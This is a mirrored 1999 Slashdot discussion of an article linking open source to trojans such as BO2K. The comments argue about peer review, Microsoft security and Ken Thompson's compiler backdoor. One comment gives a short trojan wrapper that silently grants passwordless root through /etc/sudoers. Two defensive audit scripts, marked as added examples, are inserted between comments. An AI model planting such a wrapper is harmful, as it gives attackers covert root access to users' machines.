Slashdot Mirror


Open Source Concerns: Trojan Horses In the Code

crisco writes to us with an article from InternetWeek addressing the concern of "trojan horse programs concealed inside open source code that could create new security headaches for IT managers", as the article says. The article deals mainly with the BO2K issue, which makes the whole open source connection a bit of a stretch.

186 comments

  1. Issue with retail software also by Anonymous Coward · · Score: 0

    This is not a problem with Open-Source software. It's a problem with all software. There was a front page article in Sunday's USA Today about Y2K consultants doing the same thing. They had nailed 2 or 3 companies putting back doors and other such trojans in the software they updated for Y2K.

    Who knows how many times this has been done. Blizzard did it. There are rumours MS does it. Hell, I wouldn't doubt it if every company did it.

  2. Security through Obscurity by Anonymous Coward · · Score: 0

    If this "methodology" ever had any credence, surely it's gone now. Time to put the journos on the clue train.

    Steve

  3. Internet Week Crack Whore Tech Writers by Anonymous Coward · · Score: 0

    I picked up a copy of Internet Week in an airport once and found it filled with clueless tripe, inaccurate articles and generally piss poor reporting. I suspect the rag is an advertising venue only.

    This article reflects that. I suspect it's just there for the banner ads. They'll be happy that they made /. and the resulting surge of readers will boost their ad revenue for this writer.

    In this confused writer's mind, Back Orifice is an Open Source program, so all open source programs must have at least a possibility of containing a trojan horse. The reporter does not seem to realize that peer review would reveal any such problem almost immediately. This has, in fact, happened when FTP sites or developer security was compromised. At least with Open Source programs you can go look if you want to.

    What you should REALLY fear is trojan horses in closed source programs. Recent IP proposals would allow a software company to revoke your license to their software over the Internet. Are you sure your software company hasn't already installed back doors to do that? One of the old service providers' software (AOL or Prodigy, I think) used to catalog your entire disk and send the information back to the provider. Microsoft covertly assigns a user ID to you when you register their software over the internet. I view those as trojans, just as dangerous as anything on any of the script kiddy sites. They only stopped because they got caught but we don't know for certain that there are other evils lurking in the bowels of Windows or your software apps.

    I wish this article had an E-Mail address associated with it so that I could write and express contempt at the writer there, but I guess I'll just have to settle for doing it here.

    1. Re:Internet Week Crack Whore Tech Writers by Anonymous Coward · · Score: 0

      The provider was MSN, I think. Yep, our good ol' friend...

    2. Re:Internet Week Crack Whore Tech Writers by Anonymous Coward · · Score: 0

      No, it was Prodigy.

  4. Yeah whatever... by Anonymous Coward · · Score: 0

    "They didn't have to write code and release it to the public,"

    Yeah right... if they would have just told Microsoft about the problems I'm sure Microsoft would have fixed it right away... ;)

    In any case, I don't want NT fixed... I want it to be just like it is... that way we can hack it as often as we want to...

  5. Re:FUD by Anonymous Coward · · Score: 0

    I can't believe this clown got a point for being "Insightful".

    Having open peer review is no guarantee that there won't be trojan horses in the program. Ken Thompson wrote an essay (there used to be a link from ACM, but it's gone now) where he described how you can compile code in the binary that gets propagated from release to release. That code can easily be a trojan horse, and what's even more insidious is that it never shows up in the source.

    Think about that the next time you use gcc.

  6. If they mean viruses that are Open Source.. by Anonymous Coward · · Score: 0

    It was a little shady of the author to combine the words "Open Source" with "Viruses." I think he was trying to imply what we all took it to mean. But I think what he really meant was that virus authors who share their source code with the world make it easier for the world to write more viruses.

    Of course the simple solution is that if you don't want viruses...
    DON'T USE AN OPERATING SYSTEM THAT SUPPORTS VIRUSES!
    (you know which ones I mean..)

    1. Re:If they mean viruses that are Open Source.. by bliss · · Score: 1

      I think Linux is the best platform in that respect. I used to be real big into figuring all sorts of assembly programming out and the best source to find about how to code assembly is to look at some viruses first. A large amount of the code is available. What made this so dangerous for (and still does) Microsoft operating systems is that they rely on specific DOS operating system calls that have been around for quite some time. This has given people a better than passing familiarity with the APIs necessary to create viruses.

      --
      The death of one man is a tragedy; the death of a million is a statistic --Joseph Stalin

  7. Who's at fault? by Anonymous Coward · · Score: 0

    Let's see...according to this article, the macro virus has been around since 1996. It is now 1999 (three years, an eternity in the computer industry) and Microsoft still has done nothing to fix the vulnerability in their software.

    I am not condoning the action of virus makers, but I can see how tempting it is to shoot at a target that isn't moving. Perhaps instead of whining about how the same virus is being re-written over and over again these people should be giving Microsoft a tongue lashing for not solving the problem.

    Open Source is not the problem. Failing to fix gaping security holes in software is.

  8. Open Horse Software by Anonymous Coward · · Score: 0

    The wave of the future!

    1. Re:Open Horse Software by Anonymous Coward · · Score: 0

      Open HORSE Software

      Beware of GEEKS bearing GIFs!

  9. Re:FUD by Anonymous Coward · · Score: 0

    What about someone who puts a backdoor into something (say Linux) then distributes it throughout the world. Sure all the l33t programmers out there will catch it... But I read somewhere that there are 2, possibly 3 people on the planet who use computers that couldn't read code if their lives depended on it.
    Well, I guess it's their own fault. They had the chance.

  10. Re:Why Bother? by Anonymous Coward · · Score: 0

    You know, and I know that this article is poorly researched and misinforming. Unfortunately, there are the other 95% of the world who don't know this. They will take it at face value. Without proper education (I know I sound like a missionary), the other 95% will hear the buzz words: "open source" connected with "hacker". This is a bad thing.

    Discussing it does much the same thing that open source does: By everyone reviewing it you get all the good and bad points examined and anyone who looks at it later will be able to see both, hopefully then able to write something better next time.

    Without the public behind something, it quickly dies off.

  11. Re:That is the point! by Anonymous Coward · · Score: 0

    You don't even have to modify the binary. Often a simple wrapper will do the job just fine.
    ---
    echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
    xterm.real "$*"
    ---
    might do the job... (ignore my faults... it would work if done correctly, won't it?)
    you can check if the user is root, when it's done automatically remove the wrapper and so on.

    Root should never execute a program writeable by normal users. (and if you're afraid: don't execute a program writeable by any other user except root - you have to trust him anyway *g*)

  12. Ken Thompson and the C compiler... by Anonymous Coward · · Score: 0

    IIRC, Ken talked about a C compiler that was infected with the backdoor. Every time the compiler code was compiled by itself, the compiler detected it and inserted the virus automagickally.

    All in all, it's a better argument against the dangers of having a single compiler...

    1. Re:Ken Thompson and the C compiler... by 12dec0de · · Score: 1

      Just for the sake of completeness:

      It was in a keynote to some ACM symposium that K.T. spilt his most notorious hack.

      Unfortunately the ACM has stopped putting links to these classic speeches and docs on their site.
      (I always find Dijkstra's 'gotos considered harmful' hilarious. The man is so narrow minded B-), but I digress)

      What K.T. had done was to put code in the compiler (cc) that a) reinserted itself even if removed from the source code, and b) created a backdoor in the login code when compiled with such a compiler, so that (d'oh, forgot K.T.'s fav. login) was on a system even if it was not in the /etc/passwd, including his normal password, so not everybody could come and try the backdoor.

      Before I read this I thought all those backdoor stories in Heinlein books or Gibson's stuff were just urban myth. But it is real my man.

      mfg 12dec0de

  13. Re:FUD by Anonymous Coward · · Score: 0

    In a perfect world....yes. But what about a guy who wants to pull a huge scam. Start a reputable business installing Linux networks (with his backdoor in) specializing in e-commerce sites. In this industry it takes a year or two to build up a good reputation. Then...Burn everyone.
    And before you say that no respectable programmer would do that...I am aware of that. I am not talking about them. I am talking about the career crook who is looking for the next big scam. That would be an excellent one.

  14. Re:So.... what's your point? by Anonymous Coward · · Score: 0

    Laws?????? I didn't agree to any of THEIR laws. I thought there was a law against police brutality. I think about that every time I visit my father's grave.

  15. Already Happened! by Anonymous Coward · · Score: 0

    Already happened, the situation you describe rather adequately depicts a well-known Redmond-based software house.

    One of their 'back doors' was the messages broadcast with their word processor, which led to the recent arrest of a macro-virus author.

    And just looking for such back-doors is a violation of the EULA, which prohibits reverse engineering.

    Don't be surprised if the CEO of said company (or some other programmers) has some back-door login account built in for every version of the (supposedly) network-based OS. In fact, it is known that some wartime vessels operate with this software. Just suppose what this CEO can do then!

    Therein lies the beauty of open source. You can check for such trojan horses.

  16. Re:The real Trojan Horse by Anonymous Coward · · Score: 0

    Ummm... I'm betting you've never read the story about the Trojan Horse, since you've got it all wrong.

    I'll even give you one point if you can name the work in which the story is told.

  17. Re:possibly misinterpreted by Anonymous Coward · · Score: 0

    That's just why you don't run anything as root unless absolutely necessary. And make sure to use full path names. This is most especially applicable to new users that don't know this, and it should be emphasized greatly!!

    But it is much easier to get someone to click on an email link than to convince someone to su to root and execute a script (unless they're already in root to begin with, in which case getting their computer being wiped out once would teach them not to be stupid again).
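A defensive check for the points made in comments 11 and 17 (root should never run a program writable by other users; use full path names). This is an added example, not code from the thread: a POSIX shell function that audits a PATH-style list for relative or empty entries, world-writable directories and world-writable executables, the conditions that let another user decide what root runs.

```shell
#!/bin/sh
# Added example (not from the thread). Audits a PATH-style list for entries that would let a
# non-root user get code run by root: relative/empty entries, world-writable directories
# and world-writable executables. Output: one finding per line, nothing if the list is clean.

audit_path_writable() {
    path_list=${1:-$PATH}
    old_ifs=$IFS
    IFS=:
    set -- $path_list          # split on ':' only; empty fields ("::") are kept
    IFS=$old_ifs
    for dir in "$@"; do
        case $dir in
            /*) ;;
            # "." or an empty entry means root executes whatever sits in the current directory
            *)  echo "RELATIVE_ENTRY ${dir:-<empty>}"; continue ;;
        esac
        [ -d "$dir" ] || continue
        # a world-writable directory lets any user drop in or replace a binary
        if find "$dir" -maxdepth 0 -perm -0002 2>/dev/null | grep -q .; then
            echo "WRITABLE_DIR $dir"
        fi
        # a world-writable executable can be overwritten by any user (e.g. with a wrapper)
        find "$dir" -maxdepth 1 -type f -perm -0002 -perm -0111 2>/dev/null \
            | sed 's/^/WRITABLE_EXE /'
    done
    return 0
}

# stand-alone use: audit the caller's PATH (or a list passed as the first argument)
audit_path_writable "${1:-$PATH}"
```

Group-writable entries are deliberately not flagged; whether a group other than root's is trusted is a per-system decision.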

  18. Re:What they really mean... by Anonymous Coward · · Score: 0

    Yes, NT is DoD secure ... until you connect it to a network. That is the meaning of the DoD security classification NT has.

  19. Aegis by Anonymous Coward · · Score: 0

    ... is a GPL revision control system which avoids the possibility of someone slipping a backdoor or trojan into an application.

    It can be configured to disallow any unreviewed code making it into the release. It operates at a much higher level than file-bashers like RCS, CVS or bitkeeper - none of these get anywhere near thinking about security.

    Check it out: http://www.pcug.org.au/~millerp/aegis.html

  20. Re:Where to begin... by Anonymous Coward · · Score: 0

    VIRII is not a word. It's script-kiddie pseudo-techno-babble. May Caesar haunt you this eve! Use viruses, or learn Latin.

    It's very embarrassing to see grown men blathering gahgah googoo and think they're smart.

  21. two morals to the story by Anonymous Coward · · Score: 0

    First don't use closed source programs which you cannot patch.
    Second don't use software from a very powerful company which won't pay any attention to its software.

  22. sorry I disagree on some of this by Anonymous Coward · · Score: 0

    Any system on a network can be backdoored. BO2K isn't a vulnerability in Windows. You need a vulnerability to get it installed in the first place (unless you own the box).

    Saying BO2K is a problem in Windows NT is like saying that Un*x systems are insecure just because if I have root access I can make them vulnerable and remotely controllable. Sorta obvious, isn't it?

    - Speed

  23. yeah but... by Anonymous Coward · · Score: 0

    The whole BO2K issue assumes someone got into the box already.

    Now if I had root access to your Linux box, it would be -easy- to hide backdoors. Heck how do you know I didn't replace one of your standard daemons with another executable?

    That's why anytime you have root hacked on a machine, you need to take it off the network, mount the drive on another machine for analysis and get the info you need about the attack. And promptly format and reinstall your OS when you are ready to put the machine back into service.

    This goes for ANY OS, not just Linux, and not just Windows.
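The offline check implied above (mount the drive on another machine and look for replaced daemons), as an added example that is not from the thread: a SHA-256 baseline taken from a known-good install is compared against the same paths under the mounted suspect root, and replaced, deleted and planted files are reported. The manifest format and the `make`/`verify` command names are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Builds a SHA-256 baseline of the binaries on a
# known-good install, then checks an offline-mounted suspect disk against it and reports
# MODIFIED, MISSING and NEW files. Manifest format (assumed here): "<sha256>  <relative path>".

# print the SHA-256 of one file, using whichever tool the analysis host has
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1"
    else
        shasum -a 256 "$1"
    fi | cut -d' ' -f1
}

# make_manifest ROOT DIR...  -> baseline for all regular files under ROOT/DIR, paths relative to ROOT
make_manifest() {
    root=$1; shift
    for d in "$@"; do
        find "$root/$d" -type f 2>/dev/null | sort | while read -r f; do
            printf '%s  %s\n' "$(hash_file "$f")" "${f#"$root"/}"
        done
    done
}

# verify_manifest MANIFEST ROOT DIR...  -> one line per deviation between the manifest and ROOT
verify_manifest() {
    manifest=$1; root=$2; shift 2
    # files the baseline knows about: replaced (hash differs) or deleted
    while read -r expected rel; do
        f=$root/$rel
        if [ ! -f "$f" ]; then
            echo "MISSING  $rel"
        elif [ "$(hash_file "$f")" != "$expected" ]; then
            echo "MODIFIED $rel"
        fi
    done < "$manifest"
    # files present on the suspect disk that the baseline never had (a planted binary)
    for d in "$@"; do
        find "$root/$d" -type f 2>/dev/null | sort | while read -r f; do
            rel=${f#"$root"/}
            cut -c67- "$manifest" | grep -qxF -- "$rel" || echo "NEW      $rel"
        done
    done
}

# stand-alone use:  sh this.sh make /mnt/clean usr/bin sbin > baseline.txt
#                   sh this.sh verify baseline.txt /mnt/suspect usr/bin sbin
case ${1:-} in
    make)   shift; make_manifest "$@" ;;
    verify) shift; verify_manifest "$@" ;;
esac
```

The baseline must come from clean media (or be stored off the suspect host), since a manifest kept on the compromised disk can be edited along with the binaries.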

  24. Respectable trojans by Anonymous Coward · · Score: 0

    Today, most commercial closed source software, especially Windows software for home users, includes trojans. These trojans take many forms:

    1. Changes to the registry to connect unknowing users to sites of software manufacturers and others whenever they are online, or at periodic intervals. These trojans are not usually added to the Windows "Startup Group" but instead are hidden in the registry in the run, run once and run services sections.

    Most Windows users don't even know how to remove links from the start menu, much less remove hidden tripwires from the registry.

    Almost all major commercial software companies developing for Windows use this tactic. Sometimes email is sent to "register" software the user has already paid for and to order more software, without any control over the sending of such email.

    2. Hidden id's extracted from user's machines or profiles are inserted into data saved by a manufacturer's software. Thereby, data is identified by machine or user without the user's knowledge. (Example, Microsoft's use of GUIDs to brand Office-created data.)

    3. Changes made during installation (usually from a binary install.exe or setup.exe) to file associations (mime-types) that often result in the newly installed program taking over the role of a previously installed program in handling one or more data types. Often software manufacturers fail to notify users that these changes are being made, but usually they do. That's nice of them.

    4. During "active-updates" from the internet the user's machine is usually locked. The user cannot access any other programs or use the mouse or keyboard. Of course anyone using an active update does so at great risk, especially active updates from "Trusted" sites like AOL and MS. Denial of service, anyone?

    Installation of these trojans (hidden programs installed without the user's knowledge or permission that act or initiate themselves with little or no control from the user) is a criminal offense.

    Why are these commercial companies like Microsoft, AOL, Netscape, Lotus, etc., etc., etc., not prosecuted? They are altering or damaging an individual's property without his permission and usually without his knowledge. An individual who does the same faces criminal prosecution and harassment by the FBI.

    These companies are criminal organizations. Compared to these practices, what are non-competitive practices and dirty tricks played on competitors? These are assaults on the private property and privacy of users - users who have paid good money for products which they have a right to assume will not do things to their computers during installation and later without their knowledge or permission.

    Executives of these organizations are racketeers - and should do hard time in Federal prison along with drug kingpins, child pornographers, and street criminals. This is not a matter of interpretation, but fact. Nothing could be more simple and all of this is easy to prove and well known to anyone who has installed Windows software and knows a little about what is going on behind the scenes.

    Even if these people never go to jail, they will pay. You don't get away with that - there is a special place in hell for these people. May they stay there until they see the error of their ways.
    Of course, federal prosecutors who go after little guys who write trojans and viruses but who pretend that the corporations don't do the same things won't even have it that good. May they rot in hell forever.

  25. moron journalists by Anonymous Coward · · Score: 0

    Whoever wrote this article has probably been waiting weeks to use the term 'open source' in an article. He's an idiot. (maybe he's Al Gore).

  26. the final death of NT? by Anonymous Coward · · Score: 0

    I wonder if anybody ever thought of the possibility of a variant of BO2K which has two components, which essentially are a system of auto spawning.

    one little client, and another bigger client which can act like a micro server. both of them interact to exchange data for more entry and replications.

    the sole purpose of this system is to auto-replicate to each NT machine within a network, while at the same time giving a cracker a backdoor to change the inter-program comm. mode, hence semi automatic mutation.

    so far, virii can only infect from machine to machine, through network, but I don't believe anyone has invented a virus-system, one where it interacts between virii to spread itself, a network virus.

    (Melissa is a prototype of semi intelligent network virus, although I don't believe the author intended it as such)

  27. You've got a point by Anonymous Coward · · Score: 0

    something like playing Doom or Quake in god mode

  28. Re:Ken Thompson/C compiler/backdoor by Anonymous Coward · · Score: 0

    Where I come from, that's called a virus. Pretty slick one, but it's still a virus.

  29. Re:Missing the point of BO2K by Anonymous Coward · · Score: 0

    I have to run a branch office with over a hundred systems spread through a large building. Fortunately, I don't have to admin anything outside the building. (the co I work for has about 500 or so systems at its headquarters, 100 miles away.) I want anti-virus software to allow BO on the system, but only MY copy of it. The garbage about BO just being a trojan is ridiculous.

  30. BO and Trojaning by Anonymous Coward · · Score: 0

    BO comes with a program that lets you put it into another program as a Trojan. Makes it easier to hose someone with a program that's supposed to do something else.

    But just becuz BO can be delivered with a Trojan, doesn't make it automatically bad. Matter of fact, I think MS should include it as a standard piece of Windows*. But with proper security. (if they are capable of it. MS would probably fuck up and leave a bugg^H^Hffer overflow in the code somewhere)

  31. Re:Why Bother? by Anonymous Coward · · Score: 0

    >will hear the buzz words: "open source" connected
    >with "hacker". This is a bad thing.

    Sometimes you just don't know whether crying or laughing would be the most appropriate thing to do..

  32. Re:So.... what's your point? by Anonymous Coward · · Score: 0

    Proprietary software - you have no option but to trust the programmers. You can't say "Oi, I wanna see your code".

    Worse still, you're tied in to that software, so if the company goes broke, you're as good as fxxked.

  33. Won't happen by Anonymous Coward · · Score: 1

    Before using such tactics, you have to think about the backlash if you get caught at it. Trojans and other security flaws in open source software get caught very quickly and the community would notice if a pattern started to develop. If a path was traced back to Microsoft, the ensuing backlash would make the DOJ Trial look like a nice family picnic. Among other things, they'd be opening themselves for major law suits and possibly even criminal proceedings. I doubt MS wants to take that risk (I don't doubt they're unethical enough to do it though, if they thought they could get away with it.)

  34. Man, not a lot of classicists here! by Anonymous Coward · · Score: 1

    Ok, a quick summary:

    Helen was the wife of Menelaus, king of Lacedaemon (AKA Sparta), one of the Greek leaders. She was reputed to be the most beautiful woman in the world. Paris was a prince of Troy, located across the Aegean Sea from Greece in what is now known as Turkey. Because he judged Aphrodite to be the most beautiful goddess, Paris was granted a wish, and he asked to have Helen as his wife. The Greeks were outraged at this "theft", so they gathered a massive army and sailed to Troy to get her back. (So Helen is known to have "a face that launched 1,000 ships").

    The Greeks and Trojans fought for 10 years before the gates of Troy and many heroes were killed, including Hector (the mightiest Trojan warrior) and the incomparable Achilles (who would have loved Quake - read the Iliad - after his friend Patroclus was killed, he slaughtered the Trojans by the hundreds). Achilles was killed by a cowardly arrow in the heel, the only spot left vulnerable when his goddess-mother Thetis dipped him in the river to make him invincible.

    Since the Greeks couldn't take Troy by force, Odysseus devised the great horse as a ploy. The Trojans foolishly brought it into the city, after which the Greeks came out, killed whatever resistance they met, and opened the city gates to let the rest of the army in.

    Although most people associate the Iliad with the Trojan war, the Trojan horse never appears in the Iliad - it ends with the funeral of Patroclus. The Aeneid, by Virgil, tells the story of the Trojan Horse and the sack of Troy. The Aeneid puts forth the hypothesis that Rome was founded by Trojan refugees after the fall of Troy.

    1. Re:Man, not a lot of classicists here! by Danse · · Score: 1

      > Achilles was killed by a cowardly arrow in the heel,

      What's cowardly about that? Jeez... if it's the only spot that'll do the trick, I'd say it was a pretty darn smart arrow. Doesn't seem like Achilles was all that brave himself. Charging into battle isn't such a big deal when you're invincible.

      --
      It's not enough to bash in heads, you've got to bash in minds. - Captain Hammer

  35. Wrong, wrong, wrong by Anonymous Coward · · Score: 1

    I have this article on my desk. The only link to open source is that viruses are now open source, i.e. the virus creators distribute the source code to their viruses. This allows other people to modify the virus and spread variants of it too. That was the whole open source idea of viruses. They also cite that this makes Word macro viruses devastating. At my work I've found macro viruses with comments in the code! Open source programming lets everyone see a virus or an exploit and that is why it is good. Take for example mIRC scripts of yore where the programmer would leave a back door to get ops or steal files. Everyone would find it and it would die quickly. This is what open source is about. We don't know if the government is going to settle with Microsoft secretly by saying, "You put in this code so we can read data off of all Windows machines or we will put you out of business!" If that were the case, we would never know. Might even explain the Intel processor ID problem we had for a while. Open source good, closed source bad!

  36. Calm thyself, language zealot by Anonymous Coward · · Score: 1

    Virii may not be the Caesar's Latin, as it were, but it's certainly not script-kiddie pseudo-techno-babble. To the contrary,
    virus :: virii
    is in the same spirit of hackish wordplay that gives us plurals like
    Unix :: Unices, and
    VAX :: VAXen.
    I don't know if it's actually in the Jargon File, but it's hardly kiddie-speak. We don't do away with words like hackage and bogosity just because they're not in the dictionary! :-)

    AC

  37. FUD by Anonymous Coward · · Score: 2

    What? open source programs are LESS likely to have trojans, right? If you follow common sense logic, any code that is open to review by peers is less likely to have any trojans/bugs, etc.

    FUD, nothing more.

    1. Re:FUD by bliss · · Score: 1

      Well I always check my logs and I don't have any unmentioned entries :). However I can concede that point to you; anything is possible. I just think associating problems in a movement with the movement itself is a really bad idea in general. This is just an attempt to make crackers=open source=linux hackers/enthusiasts in general to make the movement lose power.

      --
      The death of one man is a tragedy; the death of a million is a statistic --Joseph Stalin

    2. Re:FUD by Nodatadj · · Score: 1

      Just like they did with Nettools was it?

      And what happened? Within a few hours the ftp site with the trojaned code was taken offline. Out of all those "l33t" coders at least one isn't going to think "hey, there's a nasty trojan in this, I'll comment it out and not tell anyone else ". No, they're going to spread the word, and it'll be all over the place, and no-one will use it.

  38. Open Source by whoop · · Score: 1

    I liked the comment by "a security manager at a top financial services company who requested anonymity" (meaning, he was made up :) ), that it "allows an army of hackers to leverage" the program for their own purposes.

    For what it's worth, if the OS being "attacked" is open source, there is an even larger number of people ready to close up holes and what-not within a few hours, days at most. As Jason Garms is quoted, "There's nothing wrong with [Microsoft] systems until Back Orifice is installed." NT is perfect, therefore there will never be any fixes. BO2k will just be labeled a virus/trojan and to most people, that's considered sufficient protection.

  39. Re:su by whoop · · Score: 1

    If su lets you do destructive things, then that better be flagged as a trojan horse too. ;)

  40. Where to begin... by J4 · · Score: 5

    > Trojan horse programs concealed inside open source code could create new security headaches for IT managers. One such program released last week, BackOrifice 2000...

    BO2k isn't concealed inside another program..

    > When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,...

    Ah yes, I remember the good old days of proprietary virii...NOT. The explosion in macro virii wouldn't have anything to do with a program that could _host_ them now, would it? Like, I don't know, maybe MS Office? No mention of how much easier it is to construct a macro virus as opposed to a real virus done in, say, x86 assembler.

    > Organizations "absolutely should be putting security measures in place if they use NT to a great degree" to thwart BO2K-specific attacks, said Drew Williams, director of Axent Technologies' SWAT Team.

    Hmm, not quite sure what to say about this one... Are they saying:
    A) You don't need security if you don't use NT
    B) You shouldn't use NT (I'll buy that)
    C) If you only have one NT box you don't have to worry
    D) Win9x, 3.1 aren't vulnerable

    > Internet Security Systems researchers have already decoded BO2K protocols and encryption algorithms.

    Nice trick...somebody must have sent them the source code in an encrypted email, yeah, that's the ticket...

    > Jason Garms, product manager for NT security at Microsoft, said the company will fix any known security vulnerabilities in its operating systems. "There's nothing wrong with [Microsoft] systems until Back Orifice is installed."

    Oh my.... Somebody should start a 12 step group for folks like this. I detect some serious denial problems here. How much are these fixes going to cost? When can we expect delivery? That's what I thought...

    > Users on NT networks that exchange files and use Internet chat systems are at the highest risk....

    So..don't use your network to transfer files..just look at the pretty lights....

    > The elite hacker group is banking on tools such as BO2K to eventually force Microsoft to correct security weaknesses in its operating systems. Security experts don't see the logic. "They didn't have to write code and release it to the public," said ICSA's Thompson.

    The bastards, how _dare_ they try to push around Micros~1! Who's the real victim here? Micros~1 or the "Security Experts" who have to get off their well padded rear ends and do some work now? Oh wait, I guess security expert is a synonym for pundit now.

    > Once the program is released, Axent's Williams expects an "immediate spike" in hacking activity on NT systems, but expects it to trickle down to some level of manageability.

    The program is already released, Sparky... I expect this is true if we use hacking in the proper sense as in "Micros~1 programmers fixing things up a bit".. Though I expect if you replace "hack" with "kludge" it'd be a little more accurate.

    Now _this_ is the kind of story I expect to see on /... Just like backinaday ;P

    1. Re:Where to begin... by Larry+L · · Score: 1

      >BO2k isn't concealed inside another program..
      I heard it can be. You can deliver it with
      an installer.

      But in the virus sense of "concealed within", you're right

  41. Re:possibly misinterpreted by Trepidity · · Score: 3

    I found that humorous as well. Macro virus authors didn't "choose" an open source development model. Their source is available because it's in a macro, so the source has to be available. It's like saying that DOS .bat script writers have switched to open source, or that bash shell script writers have switched to open source, as if they had a choice.

  42. NT or BO2K's fault? by echo · · Score: 1

    Could someone with more knowledge of Windows NT please explain something to me...

    How does a process "hide" in NT? Is this a "feature" of NT? Is it an undocumented feature? Or is BO2K using an exploit to do this?

    If you run BO2K as a regular user, isn't it limited to that user's rights, just like in unix? If not, how does BO2K gain superuser access?

    Is this really Microsoft's fault? Or is BO2K not as harmful as everyone makes it out to be?

    1. Re:NT or BO2K's fault? by FunOne · · Score: 1

      If you can, try and find a copy of the Defcon vid feed of the release of BO2k. It spawns a remote thread on the explorer.exe process then copies itself over. This gives it super user access on the machine. Since it is now just a process on explorer.exe, it doesn't show up in 'normal' user tools. Although developer tools would (That show both process & threads).

      FunOne

      --
      FunOne
    2. Re:NT or BO2K's fault? by CJ Hooknose · · Score: 1
      How does a process "hide" in NT? Is this a "feature" of NT?

      Not sure how something could really hide, but a process tried to do that on me just yesterday. Surfed a bit with Netscape on NT, then closed that program. A bit later, I noticed that M$ Word was running even more slowly than it usually does. Same thing with my terminal window and the RC5 client.

      NT's Task Mangler showed only 3 tasks running--Telnet, RC5, and Word. Looking at the process list, though, showed that Netscape was A) still hanging around B) burning 90% of the CPU time. Hmmm.

      I'm pretty sure this wasn't supposed to happen, but it did. It would never fool a wise sysadmin, of course, but could squeak by someone who wasn't paying attention. I (think/hope) BO2K is more sophisticated in its hiding.

      --
      Give a monkey a brain and he'll swear he's the center of the universe.
  43. Oh my... by pigeon · · Score: 2

    .. these kind of tools, like bo2k have the potential to harm windows 2k very much.. to wipe it out of the marketplace.. to even destroy microsoft.. that would be terrible! That would be tragic!

    La. La. La la la.

  44. uhh. what's the POINT here? by mackga · · Score: 1

    The fact that NT is a crackers wet dream come true is somewhat glossed over here. I mean, this quote from the MS camp is really great:

    "Jason Garms, product manager for NT security at Microsoft, said the company will fix any known security vulnerabilities in its operating systems. "There's nothing wrong with [Microsoft] systems until Back Orifice is installed. In reality, [cDc] has produced code with malicious intent that targets users, not technology," (bolding mine)

    Uh, yeah, right, so the BO stuff gets installed on users now, does it?

    What bothers me is the subtle dig here at OSS development, really missing the point that if the target TECHNOLOGY wasn't so friggin full of holes, then there would be a lot fewer exploits - either in binary or open source form.

    The article could have been a lot more honest by stating: "yeah, open source 'sploits make it a bit easier to mutate the buggers, but, hey, if MS wrote decent client and server software, we wouldn't be having this discussion."

    --

    "shop smart:shop s-mart" ash

  45. Re:The real Trojan Horse by mackga · · Score: 1

    Uh, not to get all pedantic on you, but the Greeks built the Trojan horse - inspired by Odysseus - because the horse was sacred to the Trojans - who they were fighting. The Greeks left the horse outside the walls of Troy. The Trojans brought it inside with great fanfare - the dummies - and that night the Greeks inside the horse jumped out, opened the gates, and let the rest of the Greek coalition in and slaughtered just about everyone. Beware of Greeks bearing gifts!:)

    --

    "shop smart:shop s-mart" ash

  46. Re:So.... what's your point? by McKing · · Score: 1

    So all cops get slammed for your poor dead father?

    If that really happened, then I'm sorry your family was the victim of some bad cops.

    We're dealing with people here, and some of them are bad. Some are very good, but most are somewhere in between.

    If the cops got caught and prosecuted and sentenced, then the law _was_ followed.



    I'm sick of hearing all cops get maligned for the actions of a few bad apples!!

    --
    If only "common" sense was actually that common...
  47. my response by McKing · · Score: 1
    Here is a copy of my response that I sent to their feedback address:

    ------------------------------------------------

    This e-mail is in response to your online article dated July 19, 1999 entitled "Hackers Kick Open Back Door To NT". I (like many others, I presume) take exception to the way the article associates the CRACKER (cracker, not hacker, you idiots!!) community with the Open Source / Free Software community. The dangerous connections that you have made that "the Back Orifice programs are bad" and "the Back Orifice programs have the source available" leads the uninformed to believe that all open-sourced software could contain trojan horses or other viruses. In your very own article you state that the server part of the program is spread through an e-mail attachment, therefore the software responsible for delivering and allowing the release of the trojan horse is a very proprietary closed-source product.....Microsoft Outlook!!! (just as in the case of the melissa virus)


    In case you were not aware, the cracker community has almost _always_ made the source code to their viruses, trojan horses, password crackers, port scanners, and other software available to other crackers. This way the other crackers can use them. The cracker community existed long before there was a Free Software community. The Free Software community is about spreading ideas and information about computing and programming to take advantage of the massive pool of talented HACKERS (programmers) available worldwide. I hesitate to use the term hackers, since even you people in the _technical_ media obviously still haven't grasped the distinction between hackers and crackers. Crackers are about breaking into phone and computer systems for fun and profit.


    If your intent was to write an article about the possible problems with the proliferation of the BackOrifice2000 program, then you have failed miserably. It is obvious that you do not understand the problems yourself. You do not make a point of the fact that if Outlook and Word did not have such a poor excuse for security, then the program could not be spread as easily. You also do not understand the motivations of people like the cDc, who have decided that since MS will not fix the _very_ long-standing bugs in all of their windows operating systems and applications, then cDc will use them to create a program that does essentially what "PC Anywhere" does (without the large amount of money and signed NDA's Symantec had to give to receive the information to write PC Anywhere). If I attach a self-installable, preconfigured copy of PC Anywhere to an email to someone, and use it to own their machine, should Symantec be sued for writing it? cDc and other "white-hat" cracking groups have made it clear for a long time that they are trying to warn MS about these security holes so THAT THEY WILL BE FIXED. MS has shown that unless widely publicized outrage at a security bug occurs (like the melissa virus), then all but the most serious bugs and holes either go unfixed for a long time (until the next service pack or so) or they just do not get fixed, ever!!

    --
    If only "common" sense was actually that common...
  48. Re:Serious mis-interpretation going on here by McKing · · Score: 1
    Sorry, Bruce, but that is what the article says to you and me.

    What it says to 'Clueless Joe' IT Manager who has never used anything else except MS products is that since this "horrible" program that he heard about on this "trustworthy" technical web site is open sourced, then all programs and projects associated with the current buzzword "Open Source" must be bad and he should never allow them into his domain.

    It also preys upon their fears that there are armies of rabid "hackers" (/me shudders at the misuse) out there, like in the movies, who are just waiting to jump across the internet and own his boxes.

    I agree that BO is an attempt to force MS to deal with their holes, but rather than interviewing cDc about it and finding their side of the story, the writer just let some "experts" blather on.

    The whole idea that BO would now evolve into millions of strains that would keep Anti-Virus detection companies working 24x7 to fight them is even more sensational, so that was made the focus of the article.

    See my response to the article in another post.

    --
    If only "common" sense was actually that common...
  49. They do make a good argument... by Danse · · Score: 1

